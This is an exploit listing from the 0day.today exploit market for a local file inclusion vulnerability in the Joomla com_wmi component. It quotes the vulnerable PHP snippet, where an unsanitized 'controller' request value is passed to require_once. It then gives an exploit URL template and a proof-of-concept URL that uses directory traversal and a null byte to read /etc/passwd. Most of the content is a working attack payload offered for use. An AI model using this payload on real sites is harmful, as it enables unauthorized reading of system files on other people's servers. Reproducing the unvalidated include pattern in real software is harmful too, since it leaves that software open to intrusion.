[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla Component com_wmi LFI Vulnerability

Author
wishnusakti
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-11924
Category
web applications
Date add
21-04-2010
Platform
php
================================================
Joomla Component wmi (com_wmi) LFI Vulnerability
================================================

================================================================================================
 
 Title    : Joomla Component wmi (com_wmi) LFI Vulnerability
 Vendor   : http://www.paysyspro.com/
 Download : http://www.paysyspro.com/jotloader/files.download/3
 
 Date     : Sunday, 21 April 2010 - GMT +07:00 Jakarta, Indonesia
 Author   : wishnusakti + inc0mp13te (HH)
 Contact  : evileyes60117[at]yahoo.com
 
 ================================================================================================
 
 [+] Vulnerable
 
     ./components/com_wmi/wmi.php
 
     // Require specific controller if requested
    if($controller = JRequest::getVar( 'controller' )) {
        require_once( JPATH_COMPONENT.DS.'controllers'.DS.$controller.'.php' );
    }
 
 
 [+] Exploit
 
     http://[site]/[path]/index.php?option=com_wmi&controller=[LFI]
 
 [+] PoC
 
     http://localhost/index.php?option=com_wmi&controller=../../../../../../../../../etc/passwd%00
 
 ================================================================================================



#  0day.today [2024-11-15]  #